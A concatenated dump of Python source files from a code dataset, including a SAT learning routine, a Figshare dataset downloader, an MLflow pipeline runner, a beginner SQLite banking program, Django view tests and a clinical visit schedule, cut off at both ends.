True\n\n self.learn_unknown(unk)\n self.system.save()\n return False\n\n @TimeStat.log\n def find_new_unknown(self):\n while True:\n # <= level\n self.log.debug(\n f\"itr #{self.itr}: optimizing (level={self.level})... \"\n f\"stat: (upper: {self.n_upper}, lower: {self.n_lower})\"\n )\n\n assum = ()\n if self.do_min:\n # <= self.level\n assum = [-self.xsum[i] for i in range(self.level + 1, len(self.xsum))]\n elif self.do_max:\n # >= self.level\n assum = [self.xsum[i] for i in range(self.level + 1)]\n\n sol = self.sat.solve(assumptions=assum)\n # self.log.debug(f\"SAT solve: {bool(sol)}\")\n if sol:\n vec = SparseSet(\n i for i, x in enumerate(self.xs) if sol.get(x, 0) == 1\n )\n self.log.debug(\n f\"unknown #{self.itr}, wt {len(vec)}: {truncstr(vec)}\"\n )\n if self.level is not None:\n assert len(vec) == self.level, \\\n \"start level set incorrectly?\"\n return vec\n\n # no sol at current level\n if self.do_opt:\n if self.do_min:\n self.level += 1\n if self.level > self.N:\n self.log.info(\"no new unknowns\")\n return False\n self.log.info(f\"increasing level to {self.level}\")\n\n elif self.do_max:\n self.level -= 1\n if self.level < 0:\n self.log.info(\"no new unknowns\")\n return False\n self.log.info(f\"decreasing level to {self.level}\")\n\n # on each level change check if not done already\n if self.sat.solve() is False:\n self.log.info(f\"exhausted from level {self.level}\")\n return False\n else:\n return False\n assert 0\n\n @TimeStat.log\n def learn_unknown(self, vec):\n is_lower, meta = self.query(vec)\n\n if is_lower:\n self.n_lower += 1\n if self.do_max:\n self.log.debug(f\"fast lower: wt {len(vec)} meta {meta}\")\n self.system.add_lower(vec, meta)\n self.model_exclude_sub(vec)\n else:\n self.learn_up(vec, meta)\n else:\n self.n_upper += 1\n if self.do_min:\n self.log.debug(f\"fast upper: wt {len(vec)} meta {meta}\")\n self.system.add_upper(vec, meta)\n self.model_exclude_super(vec)\n else:\n self.learn_down(vec, meta)\n","repo_name":"hellman/monolearn","sub_path":"monolearn/GainanovSAT.py","file_name":"GainanovSAT.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12461835695","text":"import streamlit as st\n\nfrom model.data_management import load_dataset\n\n\ndef upload_dataset():\n st.markdown(\"## Upload Dataset\")\n\n df = None\n dataset_file = st.file_uploader(\"Choose a dataset \", type=\"csv\", accept_multiple_files=False)\n\n if dataset_file is not None:\n df = load_dataset(dataset_file)\n\n return df","repo_name":"Yakagi17/simple_auto_eda","sub_path":"interface/data_management_interface.py","file_name":"data_management_interface.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6247048086","text":"\"\"\"\nDownloads files from Figshare.\n\nMain page: https://figshare.com/authors/Kamal_Choudhary/4445539\n\"\"\"\n\nimport zipfile\nimport tempfile\nimport os\nimport numpy as np\nimport io\nimport requests\nfrom jarvis.db.jsonutils import loadjson\nfrom jarvis.io.vasp.outputs import Vasprun\nfrom jarvis.io.vasp.inputs import Poscar\nfrom jarvis.io.wannier.outputs import WannierHam\n# from jarvis.analysis.structure.spacegroup import Spacegroup3D\n\n\ndef datasets(dataset=\"\"):\n \"\"\"Get collection of dataset names and URLs.\"\"\"\n if dataset == \"dft_2d\":\n url = \"https://ndownloader.figshare.com/files/22471019\"\n js_tag = \"jdft_2d-4-26-2020.json\"\n print(\"Obtaining 2D dataset ...\")\n elif dataset == \"dft_3d\":\n url = \"https://ndownloader.figshare.com/files/22471022\"\n js_tag = \"jdft_3d-4-26-2020.json\"\n print(\"Obtaining 3D dataset ...\")\n elif dataset == \"cfid_3d\":\n url = \"https://ndownloader.figshare.com/files/22470818\"\n js_tag = \"jml_3d-4-26-2020.json\"\n print(\"Obtaining JARVIS-3D CFID dataset 37k...\")\n elif dataset == \"mp_3d\":\n url = \"https://ndownloader.figshare.com/files/24979850\"\n js_tag = \"CFID_mp_desc_data_84k.json\"\n print(\"Obtaining Materials Project-3D CFID dataset 84k...\")\n elif dataset == \"oqmd_3d\":\n url = \"https://ndownloader.figshare.com/files/24981170\"\n js_tag = \"CFID_OQMD_460k.json\"\n print(\"Obtaining OQMD-3D CFID dataset 460k...\")\n elif dataset == \"qm9\":\n url = \"https://ndownloader.figshare.com/files/25159592\"\n js_tag = \"qm9_data_cfid.json\"\n print(\"Obtaining QM9-molecule CFID dataset 134k...\")\n elif dataset == \"aflow1\":\n url = \"https://ndownloader.figshare.com/files/25453256\"\n js_tag = \"CFID_AFLOW1.json\"\n print(\"Obtaining AFLOW-1 CFID dataset 400k...\")\n elif dataset == \"aflow2\":\n url = \"https://ndownloader.figshare.com/files/25453265\"\n js_tag = \"CFID_AFLOW2.json\"\n print(\"Obtaining AFLOW-2 CFID dataset 400k...\")\n elif dataset == \"raw_files\":\n url = \"https://ndownloader.figshare.com/files/25295732\"\n js_tag = \"figshare_data-10-28-2020.json\"\n print(\"Obtaining raw io files...\")\n else:\n ValueError(\"Dataset doesnt exist\", dataset)\n return url, js_tag\n\n\ndef data(dataset=\"dft_2d\"):\n \"\"\"Provide main function to download datasets.\"\"\"\n url, js_tag = datasets(dataset)\n\n # r = requests.get(url)\n # z = zipfile.ZipFile(io.BytesIO(r.content))\n # wdat = z.read(js_tag).decode(\"utf-8\")\n # fd, path = tempfile.mkstemp()\n # with os.fdopen(fd, \"w\") as tmp:\n # tmp.write(wdat)\n # data = loadjson(path)\n\n path = str(os.path.join(os.path.dirname(__file__), js_tag))\n if not os.path.isfile(path):\n zfile = str(os.path.join(os.path.dirname(__file__), \"tmp.zip\"))\n r = requests.get(url)\n f = open(zfile, \"wb\")\n f.write(r.content)\n f.close()\n\n with zipfile.ZipFile(zfile, \"r\") as zipObj:\n # zipObj.extract(path)\n zipObj.extractall(os.path.join(os.path.dirname(__file__)))\n os.remove(zfile)\n data = loadjson(path)\n return data\n\n\ndef get_jid_data(jid=\"JVASP-667\", dataset=\"dft_2d\"):\n \"\"\"Get info for a jid and dataset.\"\"\"\n d = data(dataset)\n for i in d:\n if i[\"jid\"] == jid:\n return i\n\n\ndef get_ff_eneleast():\n \"\"\"Get JARVIS-FF related data.\"\"\"\n jff1 = str(os.path.join(os.path.dirname(__file__), \"jff1.json\"))\n if not os.path.isfile(jff1):\n r = requests.get(\"https://ndownloader.figshare.com/files/10307139\")\n f = open(jff1, \"wb\")\n f.write(r.content)\n f.close()\n data_ff1 = loadjson(jff1)\n return data_ff1\n\n\n# Raw I/O files on figshare repository\nfls = data(\"raw_files\")\n\n\ndef get_wann_electron(jid=\"JVASP-816\"):\n \"\"\"Download electron WTBH if available.\"\"\"\n w = \"\"\n ef = \"\"\n for i in fls[\"WANN\"]:\n if i[\"name\"].split(\".zip\")[0] == jid:\n r = requests.get(i[\"download_url\"])\n z = zipfile.ZipFile(io.BytesIO(r.content))\n wdat = z.read(\"wannier90_hr.dat\").decode(\"utf-8\")\n js_file = jid + \".json\"\n js = z.read(js_file).decode(\"utf-8\")\n fd, path = tempfile.mkstemp()\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(wdat)\n w = WannierHam(path)\n fd, path = tempfile.mkstemp()\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(js)\n d = loadjson(path)\n ef = d[\"info_mesh\"][\"efermi\"]\n fd, path = tempfile.mkstemp()\n pos = z.read(\"POSCAR\").decode(\"utf-8\")\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(pos)\n atoms = Poscar.from_file(path).atoms\n return w, ef, atoms\n\n\ndef get_wann_phonon(jid=\"JVASP-1002\", factor=15.633302):\n \"\"\"Download phonon WTBH if available.\"\"\"\n from jarvis.io.phonopy.outputs import get_phonon_tb\n for i in fls[\"FD-ELAST\"]:\n if isinstance(i, dict):\n if i[\"name\"].split(\".zip\")[0] == jid:\n r = requests.get(i[\"download_url\"])\n z = zipfile.ZipFile(io.BytesIO(r.content))\n vrun_path = z.read(\"vasprun.xml\").decode(\"utf-8\")\n fd, path = tempfile.mkstemp()\n with os.fdopen(fd, \"w\") as tmp:\n tmp.write(vrun_path)\n vrun = Vasprun(path)\n fc = vrun.phonon_data()[\"force_constants\"]\n atoms = vrun.all_structures[0]\n # print(atoms)\n # atoms = Atoms.from_poscar(pos)\n # print(atoms)\n fd, path = tempfile.mkstemp()\n get_phonon_tb(fc=fc, atoms=atoms, out_file=path, factor=factor)\n # cvn = Spacegroup3D(atoms).conventional_standard_structure\n w = WannierHam(path)\n return w, atoms\n\n\ndef get_hk_tb(k=np.array([0, 0, 0]), w=[]):\n \"\"\"Get Wannier TB Hamiltonian.\"\"\"\n nr = w.R.shape[0]\n hk = np.zeros((w.nwan, w.nwan), dtype=complex)\n kmat = np.tile(k, (nr, 1))\n exp_ikr = np.exp(1.0j * 2 * np.pi * np.sum(kmat * w.R, 1))\n temp = np.zeros(w.nwan ** 2, dtype=complex)\n for i in range(nr):\n temp += exp_ikr[i] * w.HR[i, :]\n hk = np.reshape(temp, (w.nwan, w.nwan))\n hk = (hk + hk.T.conj()) / 2.0\n return hk\n\n\n\"\"\"\nif __name__ == \"__main__\":\n\n data_2d = data(dataset='dft_2d')\n print('2d',len(data_2d))\n data_3d = data(dataset='dft_3d')\n print('3d',len(data_3d))\n data_ml = data(dataset='cfid_3d')\n print('cfid3d',len(data_ml))\n data_ff = get_ff_eneleast()\n print ('ff',len(data_ff))\n\"\"\"\n","repo_name":"mumerchem/jarvis","sub_path":"jarvis/db/figshare.py","file_name":"figshare.py","file_ext":"py","file_size_in_byte":6655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"11358185371","text":"import tkinter as tk\nfrom tkinter import filedialog\nimport sys\nimport time\nsys.path.append(__file__.replace(\"\\\\\", \"/\").replace(\"mainWindow.py\", \"\"))\nRESOURCESDIR=__file__.replace(\"\\\\\",'/').replace(\"/src/views/mainWindow.PY\",\"\")+\"/ressouces\"\n\nclass MasterView(tk.Frame):\n\n def __init__(self, parent) -> None:\n super().__init__(parent)\n self.parent = parent\n \n self.create_menu()\n\n def postInit(self) -> None:\n self.parent.bind(\"\", self.parent.controller.rightClick)\n\n def create_menu(self):\n self.menubar= tk.Menu(self.parent) \n\n self.menuFile = tk.Menu(self.parent, tearoff=0)\n self.menuFile.add_command(label=\"Open File\",command=None)\n self.menuFile.add_command(label=\"Open Video\",command=None)\n self.menuFile.add_command(label=\"Save\",accelerator=\"CTRL+N\",command=self.saveFile)\n self.menuFile.add_separator()\n self.menuFile.add_command(label=\"Quit\",command=None)\n self.menubar.add_cascade(label=\"File\",menu=self.menuFile)\n \n\n self.menuView=tk.Menu(self.parent,tearoff=0)\n self.menuView.add_command(label=\"Show Graph\",command=None)\n self.menubar.add_cascade(label=\"View\",menu=self.menuView)\n \n self.menuPoint=tk.Menu(self.parent,tearoff=0)\n self.menuPoint.add_command(label=\"Def Scale\",command=None)\n self.menuPoint.add_command(label=\"Place Repere\",command=None) \n self.menubar.add_cascade(label=\"Pointage\",menu=self.menuPoint)\n\n self.menuEdit=tk.Menu(self.parent,tearoff=0)\n self.menuEdit.add_command(label=\"Print Value\",command=None)\n self.menubar.add_cascade(label=\"Edit\",menu=self.menuEdit)\n\n self.parent.config(menu=self.menubar) \n def saveFile(self):\n with tk.filedialog.asksaveasfile(parent=self.parent,mode='wb',confirmoverwrite=True,defaultextension=\".csv\",initialdir=RESOURCESDIR,initialfile=f\"data_{time.time()*10:.0f}.csv\") as file:\n pass\n #on ouvre en ecriture bytes pour eviter les putain de test unitaire qui ne marches pas sur linux\n #self.parent.controller.exportDataToCsv(fileIO=file) \n \n \n\n ","repo_name":"vuvu700/projet_technologique","sub_path":"videoTracker/src/views/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2985874915","text":"import mlflow\nfrom pathlib import Path\nfrom datetime import datetime, timezone\n\n\nmlflow.set_tracking_uri(\"http://127.0.0.1:5001\")\n\nmlflow.set_experiment(\"multi_step_poc_w_separate_files\")\n\nmlflow.autolog()\n\nwith mlflow.start_run() as mlflow_run:\n run_name = f\"main_run\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n with mlflow.start_run(nested=True) as step_01:\n run_name = f\"step_01\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 1)\n\n filepath = Path(__file__).parent / \"steps\" / \"download_raw_data.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n with mlflow.start_run(nested=True) as step_02:\n run_name = f\"step_02\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 2)\n\n filepath = Path(__file__).parent / \"steps\" / \"validate_input.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n with mlflow.start_run(nested=True) as step_03:\n run_name = f\"step_03\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 3)\n\n filepath = Path(__file__).parent / \"steps\" / \"train_model.py\"\n assert filepath.exists()\n mlflow.log_param(\"step_name\", filepath.name)\n mlflow.log_artifact(filepath)\n exec(open(filepath).read())\n\n\n with mlflow.start_run(nested=True) as step_04:\n run_name = f\"step_04\"\n mlflow.set_tag(\"mlflow.runName\", run_name)\n\n mlflow.log_param(\"step\", 4)\n mlflow.log_param(\"step_name\", \"Post-processing\")\n","repo_name":"perhedbrant/mlflow-poc","sub_path":"example_projects/multistep_workflow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19667732464","text":"import random\nimport sqlite3\n\n# The reason why the test #4 doesnt pass is because i store the bin and account number separated, not as a whole, and the thest check the number as a whole.\n# Connect to database and create a cursor instance.\n\nconn = sqlite3.connect(\"../card.s3db\")\ncursor = conn.cursor()\n\nADD_CARD = \"INSERT INTO card (id, number, pin, balance) VALUES (?, ?, ?, ?)\"\n\nDELETE_CARD = \"DELETE FROM card WHERE number == ?\"\n\nGET_ALL_CARDS = \"SELECT * FROM card\"\n\nGET_CARD_NUMBER_ofACCOUNT = \"SELECT number FROM card WHERE number == ? \"\n\nGET_PIN_NUMBER_ofACCOUNT = \"SELECT pin FROM card WHERE number == ? \"\n\nGET_BALANCE_ofACCOUNT = \"SELECT balance FROM card WHERE number == ?\"\n\nUPDATE_BALANCE_ofAccount = \"UPDATE card SET balance=(balance - ?) WHERE number == ? \"\n\n\ndef create_card_table():\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS card (\n id INTEGER,\n number TEXT,\n pin TEXT,\n balance INTEGER DEFAULT 0\n )\"\"\")\n conn.commit()\n\n\ndef drop_card_table():\n cursor.execute(\"\"\"DROP TABLE card\"\"\")\n conn.commit()\n\n\ndrop_card_table()\ncreate_card_table()\n\n\ndef remove_symbols_from_string(stringToEdit) -> str:\n \"\"\"\n Convert the fetch into a string, then removes symbols [ ] ( ) , from the string.\n \"\"\"\n string = str(stringToEdit)\n for z in (\"[\", \"\"), (\"]\", \"\"), (\"(\", \"\"), (\")\", \"\"), (\",\", \"\"):\n string = string.replace(*z)\n return string\n\n\ndef gen_acc_number() -> str:\n acc_num = \"\"\n while len(acc_num) < 9:\n acc_num += str(random.randint(0, 9))\n return acc_num\n\n\ndef gen_pin_code() -> str:\n pin_code = \"\"\n while len(pin_code) < 4:\n pin_code += str(random.randint(0, 9))\n return pin_code\n\n\ndef gen_check_digit(bank_idNumber, account_number) -> str:\n \"\"\"\n Luhn's algorithm: all numbers % 10 == 0\n so sum of all numbers of the card number - without check digit - (sum)\n (sum + x) % 10 == 0\n Returns the check-digit that pass Luhn's algorithm\n \"\"\"\n count_list = list(bank_idNumber) + list(account_number)\n int_count_list = [int(k) for k in count_list]\n new_list = []\n check_digit = \"\"\n for a in range(0, len(int_count_list), 2):\n new_list.append(int_count_list[a] * 2)\n for b in range(1, len(int_count_list), 2):\n new_list.append(int_count_list[b])\n c = 0\n for k in new_list:\n if k > 9:\n c += 9\n int_sum = sum(new_list) - c\n\n for x in range(10):\n if (int_sum + x) % 10 == 0:\n check_digit = str(x)\n return check_digit\n\n\nclass CardNumber:\n def __init__(self, _bin, _acc_number, _pin_code):\n self.bin = _bin\n self.acc_number = _acc_number\n self.pin_code = _pin_code\n self.card_number_no_check_digit = self.bin + self.acc_number\n self.balance = 0\n\n\niin_bin = \"400000\"\nchoice = -1\nwhile choice != 0:\n log_in = False\n choice = input(\"1. Create an account\\n\"\n \"2. Log into account\\n\"\n \"3. View all accounts\\n\"\n \"0. Exit\\n\")\n if choice == \"1\":\n acc_number = gen_acc_number()\n check_sum = gen_check_digit(iin_bin, acc_number)\n card_number = iin_bin + acc_number + check_sum\n card_pin = gen_pin_code()\n print(\"\\nYour card has been created\\n\"\n \"Your card number:\\n\" +\n card_number + \"\\nYour card PIN:\\n\" +\n card_pin + \"\\n\")\n card = (iin_bin, acc_number + check_sum, card_pin, 0)\n cursor.execute(ADD_CARD, card)\n conn.commit()\n print(\"New card added to the card\\'s database.\")\n print(\"BIN: \" + card[0] + \" Acc_#: \" + card[1] + \"\\n\"\n \"PIN: \" + card[2] + \" Balance: \" + str(card[3]) + \" $\" + \"\\n\")\n elif choice == \"2\":\n # Log into acc\n user = input(\"Enter you card number:\\n\")\n pin = input(\"Enter your PIN:\\n\")\n user_number = user[6:]\n cursor.execute(GET_CARD_NUMBER_ofACCOUNT, (user_number,))\n user_fetch = cursor.fetchall()\n user_data = remove_symbols_from_string(user_fetch)\n cursor.execute(GET_PIN_NUMBER_ofACCOUNT, (user_number,))\n pin_fetch = cursor.fetchall()\n pin_data = remove_symbols_from_string(pin_fetch)\n card_number = user\n # user[6:]: slice the BIN (400000) from the input, to compare only acc_number, not card number.\n if user_number in user_data:\n if pin in pin_data:\n print(\"\\nYou have successfully logged in!\")\n log_in = True\n while log_in:\n menu = input(\"\\n1. Balance\\n\"\n \"2. Add income\\n\"\n \"3. Do transfer\\n\"\n \"4. Close account\\n\"\n \"5. Log out\\n\"\n \"0. Exit\\n\")\n if menu == \"1\":\n # Print balance\n acc = (user_number,)\n cursor.execute(GET_BALANCE_ofACCOUNT, acc)\n fetch = cursor.fetchall()\n balance = remove_symbols_from_string(fetch)\n print(\"\\nBalance: \" + balance) # + \" $\")\n elif menu == \"2\":\n # Add income\n income = int(input(\"Enter income:\\n\"))\n data = (income, user_number)\n cursor.execute(UPDATE_BALANCE_ofAccount, data)\n conn.commit()\n print(\"\\nIncome was added!\")\n elif menu == \"3\":\n # Transfer money to another card.\n cursor.execute(GET_BALANCE_ofACCOUNT, (user_number,))\n fetch = cursor.fetchall()\n current_balance = int(remove_symbols_from_string(fetch))\n print(\"\\nTransfer\")\n card_num_to_transfer = input(\"Enter card number:\\n\")\n if card_num_to_transfer[6:] == user_number:\n print(\"\\nYou can't transfer money to the same account!\\n\")\n break\n if card_num_to_transfer[-1] == gen_check_digit(card_num_to_transfer[:5],\n card_num_to_transfer[6:]):\n # Means it pass Luhn's algorithm.\n cursor.execute(GET_CARD_NUMBER_ofACCOUNT, (card_num_to_transfer[6:],))\n nums = cursor.fetchall()\n if (card_num_to_transfer[6:],) in nums:\n amount = int(input(\"Enter how much money you want to transfer:\\n\"))\n if amount <= current_balance:\n # do transfer and print success.\n sender = (amount, user_number)\n receiver = (amount, card_num_to_transfer[6:])\n cursor.execute(UPDATE_BALANCE_ofAccount, sender)\n cursor.execute(UPDATE_BALANCE_ofAccount, receiver)\n conn.commit()\n print(\"Success!\")\n else:\n print(\"Not enough money!\")\n else:\n print(\"Such a card does not exist.\")\n else:\n print(\"\\nProbably you made mistake in the card number. Please try again!\\n\")\n break\n elif menu == \"4\":\n # Close account\n cursor.execute(DELETE_CARD, (user_number,))\n conn.commit()\n print(\"\\nThe account has been closed!\\n\")\n break\n elif menu == \"5\":\n # Log out\n print(\"\\nYou have successfully logged out!\\n\")\n log_in = False\n elif menu == \"0\":\n print(\"\\nBye!\")\n conn.close()\n exit()\n else:\n print(\"Incorrect parameter.\")\n else:\n print(\"\\nWrong card number or PIN!\\n\")\n else:\n print(\"\\nWrong card number or PIN!\\n\")\n elif choice == \"3\":\n # View all accounts\n cursor.execute(GET_ALL_CARDS)\n data = cursor.fetchall()\n for i in data:\n print(i)\n print()\n elif choice == \"0\":\n # Exit\n print(\"Bye!\")\n conn.close()\n exit()\n else:\n print(\"Incorrect parameter.\")\n","repo_name":"jonestremblay/Simple-Banking-System","sub_path":"banking/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30174654665","text":"from django import forms\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom ..models import Group, Post, User\n\nNUMBER_OF_POSTS = 13\nNUMBER_OF_POSTS_ON_FIRST_PAGE = 10\nNUMBER_OF_POSTS_ON_SECOND_PAGE = 3\n\n\nclass TaskPagesTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.user = User.objects.create_user(username='StasBasov')\n cls.authorized_client = Client()\n cls.authorized_client.force_login(cls.user)\n\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n\n cls.post = Post.objects.create(\n text='Тестовый пост',\n author=cls.user,\n group=cls.group,\n )\n cls.new_group = Group.objects.create(\n title='Новая граппа',\n slug='new_slug',\n description='Новое описание',\n )\n\n def test_pages_uses_correct_template(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n\n templates_pages_names = {\n reverse('posts:index'): 'posts/index.html',\n reverse('posts:group_posts',\n kwargs={'slug': 'test-slug'}): 'posts/group_list.html',\n reverse('posts:profile',\n kwargs={'username': 'StasBasov'}): 'posts/profile.html',\n reverse('posts:post_detail',\n kwargs={'post_id':\n self.post.id}): 'posts/post_detail.html',\n reverse('posts:post_create'): 'posts/create_post.html',\n reverse('posts:post_edit',\n kwargs={'post_id':\n self.post.id}): 'posts/create_post.html'}\n\n for reverse_name, template in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.authorized_client.get(reverse_name)\n self.assertTemplateUsed(response, template)\n\n def test_index_show_correct_context(self):\n \"\"\"Шаблон index сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(reverse('posts:index'))\n page_obj = response.context['page_obj'][0]\n\n self.assertEqual(page_obj, self.post)\n\n def test_group_list_show_correct_context(self):\n \"\"\"Шаблон group_list сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:group_posts', kwargs={'slug': 'test-slug'}))\n group = response.context['group']\n page_obj = response.context['page_obj'][0]\n\n self.assertEqual(page_obj, self.post)\n self.assertEqual(group, self.group)\n\n def test_profile_show_correct_context(self):\n \"\"\"Шаблон profile сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:profile', kwargs={'username': 'StasBasov'}))\n author = response.context['author']\n page_obj = response.context['page_obj'][0]\n\n self.assertEqual(page_obj, self.post)\n self.assertEqual(author, self.post.author)\n\n def test_post_detail_show_correct_context(self):\n \"\"\"Шаблон post_detail сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:post_detail', kwargs={'post_id': self.post.id}))\n post = response.context['post']\n\n self.assertEqual(post, self.post)\n\n def test_post_create_show_correct_context(self):\n \"\"\"Шаблон post_create сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(reverse('posts:post_create'))\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.fields.ChoiceField, }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context.get('form').fields.get(value)\n self.assertIsInstance(form_field, expected)\n\n self.assertIn('is_edit', response.context)\n self.assertFalse(response.context['is_edit'])\n\n def test_post_edit_show_correct_context(self):\n \"\"\"Шаблон post_edit сформирован с правильным контекстом.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:post_edit', kwargs={'post_id': self.post.id}))\n form_fields = {\n 'text': forms.fields.CharField,\n 'group': forms.fields.ChoiceField, }\n for value, expected in form_fields.items():\n with self.subTest(value=value):\n form_field = response.context.get('form').fields.get(value)\n self.assertIsInstance(form_field, expected)\n\n self.assertIn('is_edit', response.context)\n self.assertTrue(response.context['is_edit'])\n\n def test_new_post(self):\n \"\"\"Новый пост появляется на трёх страницах.\"\"\"\n\n pages = (\n reverse('posts:index'),\n reverse('posts:profile', kwargs={'username': self.user.username}),\n reverse('posts:group_posts', kwargs={'slug': self.group.slug}),)\n\n for page in pages:\n response = self.authorized_client.get(page)\n page_obj = response.context['page_obj']\n\n self.assertIn(self.post, page_obj)\n\n def test_new_post_not_on_other_group_page(self):\n \"\"\"Новый пост не попал на страницу другой группы.\"\"\"\n\n response = self.authorized_client.get(\n reverse('posts:group_posts', kwargs={'slug': self.new_group.slug}))\n\n page_obj = response.context['page_obj']\n\n self.assertNotIn(self.post, page_obj)\n\n\nclass PaginatorViewsTest(TestCase):\n \"\"\"Паджинатор работает на всех страницах.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.user = User.objects.create_user(username='StasBasov')\n cls.authorized_client = Client()\n cls.authorized_client.force_login(cls.user)\n\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n text='Тестовый пост',\n author=cls.user,\n group=cls.group,\n )\n\n posts = []\n for _ in range(1, NUMBER_OF_POSTS):\n posts.append(Post(\n text='Один из множества постов',\n author=cls.user,\n group=cls.group,\n ))\n\n Post.objects.bulk_create(posts)\n\n def test_paginator_on_three_pages(self):\n group_page = '/group/test-slug/'\n profile_page = '/profile/StasBasov/'\n main_page = '/'\n second_page = '?page=2'\n\n page_expected_posts = {\n group_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n profile_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n main_page: NUMBER_OF_POSTS_ON_FIRST_PAGE,\n group_page + second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n profile_page + second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n main_page + second_page: NUMBER_OF_POSTS_ON_SECOND_PAGE,\n }\n\n for address, expected_number_of_posts in page_expected_posts.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n total_posts_on_page = len(response.context['page_obj'])\n\n self.assertEqual(\n total_posts_on_page,\n expected_number_of_posts\n )\n","repo_name":"Alarm19/hw04_tests","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15086016954","text":"from edc_visit_schedule import Visit as BaseVisit\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom ....crfs import caregiver_crfs_prn, requisitions_prn, bc_crf_2000, crf_2001, b_crf_3000\nfrom ....crfs import caregiver_crfs_unscheduled, caregiver_ref_crf_prn\n\n\nclass Visit(BaseVisit):\n\n def __init__(self, crfs_unscheduled=None, requisitions_unscheduled=None,\n crfs_prn=None, requisitions_prn=None,\n allow_unscheduled=None, **kwargs):\n super().__init__(\n allow_unscheduled=True if allow_unscheduled is None else allow_unscheduled,\n crfs_unscheduled=crfs_unscheduled or caregiver_crfs_unscheduled,\n requisitions_unscheduled=requisitions_unscheduled,\n crfs_prn=crfs_prn,\n requisitions_prn=requisitions_prn,\n **kwargs)\n\n\nvisit2000 = Visit(\n code='2000M',\n title='Cohort B Enrollment Visit',\n timepoint=0,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(months=3),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=bc_crf_2000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit2001 = Visit(\n code='2001M',\n title='Cohort B Quarterly Visit 1',\n timepoint=1,\n rbase=relativedelta(days=90),\n rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3000 = Visit(\n code='3000M',\n title='Cohort B Follow Up Visit',\n timepoint=14,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(days=30),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=b_crf_3000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3000sq = Visit(\n code='3000B',\n title='Cohort B SQ Follow Up Visit',\n timepoint=14,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(days=30),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=b_crf_3000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3001 = Visit(\n code='3001M',\n title='Cohort B Follow Up Quarterly Visit 1',\n timepoint=2,\n rbase=relativedelta(days=90),\n rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_crfs_prn,\n facility_name='5-day clinic')\n\nvisit3001sq = Visit(\n code='3001S',\n title='Cohort B Sec Follow Up Quarterly Visit 1',\n timepoint=2,\n rbase=relativedelta(days=90),\n 